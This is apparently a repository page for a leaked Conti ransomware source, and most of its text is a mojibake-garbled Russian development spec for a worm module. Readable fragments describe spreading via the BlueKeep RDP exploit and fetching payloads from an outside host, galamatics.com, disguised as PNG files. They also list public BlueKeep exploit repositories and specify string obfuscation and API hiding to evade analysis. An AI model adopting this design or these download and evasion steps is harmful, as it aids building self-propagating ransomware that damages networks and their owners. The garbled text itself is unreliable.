Conti Ransomware malware leak WITH LOCKER
You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
|
|
������ �������������������������� �������
����
���������� ��������� ������ ��������������� �� ����:* �������� ������������� ��������� ��� ���������� ����� ����������* ���������� ������������ ��� ��������� � �������� ��� ��� ������ ����� ���������* �������� �������� BlueKeep � ������.
�������� ������
������ ��������� ��������� ���� � ��������� �� ��������� ������� ����� �������� - ��� ���� ����������.��������, ��� ����-��� ��������� �������� �� ������ http://galamatics.com/jomangi1.png � http://galamatics.com/jomangi2.png(��������� ����� ����� DownloadFromUrlA) � ��������� ��. ����������� ����-���� ����������:���� �� ����������� ��� ���������, ��� ����� ���� ROP.���� ���, �� �������� ��� ������������ ����� ������ ������� � ������� ������� � ������ ����� ���.
������������ ������������ �� ���� ����� �������� ���������:- ������� ������� ������ Windows- ����� Windows- LDAP
������ �������� � ������������ � ���������� module_HOWTO.
���������
��� ��������� ������ ����������� � ������ ��������� module_HOWTO.
��� ������������ ���� �� ������� ���������.
��������� ������� ���������:1) ��������� ������ � �����������:- � ��������� ������ ���� �������� ����� Exploit(const char* hostname) (����� ����� ���� ����� ������ ��� �� ���)- ��� ������������ ���� ������ ���� ���������� �� ���� ������������- ������ ������ ���������� ��� �����������, �� ������ ���������� ������� ���� � �������� ���������, �������� �����������.���� - ���������������� ��� ������������, ��� �������� �� ��� ������ ������ �������.���������� "������ � ������" �� ����� (������ �������� � ������ ��������� ������������) - ���� ���� ������� ������ �������������.
����������� ����� ����������� ������� ���:- ��������� � ����� config.h ����������, ����� ������ ������ �� ��������.����� �� ��������� ��������� �������������� � ������ ������ ���.��������, ���� ���������� �������� FOO, ������
config.h:#define FOO#undef BAR
foo.cpp:#include "config.h"#ifdef FOO...code here...#endif
- �������� ��������� ����� ������ ���� ������ ��� ������ ��������- ����� ����� ������������ ������� ���������� � Visual Studio ��� ������ ���������� ����� ������ ����� ������� ������������� �������� ��������������� � ���������� ������ ��� ����������� ������� �������.�� ������ ������� ������� ���� ������� ������.
2) � ������ ������� �������� �������� BlueKeep � ������������ � ����������� ������ � �����������.���������� �� BlueKeep:https://github.com/umarfarook882/CVE-2019-0708https://github.com/n1xbyte/CVE-2019-0708https://github.com/adalenv/CVE-2019-0708-Toolhttps://github.com/gobysec/CVE-2019-0708https://github.com/Ekultek/BlueKeephttps://github.com/robertdavidgraham/rdpscanhttps://github.com/zerosum0x0/CVE-2019-0708https://github.com/dothanthitiendiettiende/BlueKeephttps://github.com/Ekultek/BlueKeep/blob/master/bluekeep_poc.py
3) ������������ ������- ������������� ������ ����������� Andrivet Advanced Obfuscator, ��������� ���������� �� MetaString4.h- ������������� ��������� ������ ����� GetApi- �������� ��������� �������: + Module wormDll build %date% %time% started - ��� ������ ������ + Trying %sploit% on %hostname% (%addr%) - ��� ���������� ��������� � �����- ������� ����������� � ���� � ������� ��������. ��� ���� ����� ��, ��� � ������������ ������, �� � ����������� .log������������ ����������� ���������� �����������.- ����������� ������ ����������� ������ � �������� ������ Debug, Release_logged. � ������� Release_nologs ����������� ������ �����������(����������� �������� LOG_TO_FILE, LOG_TO_CONSOLE)
|
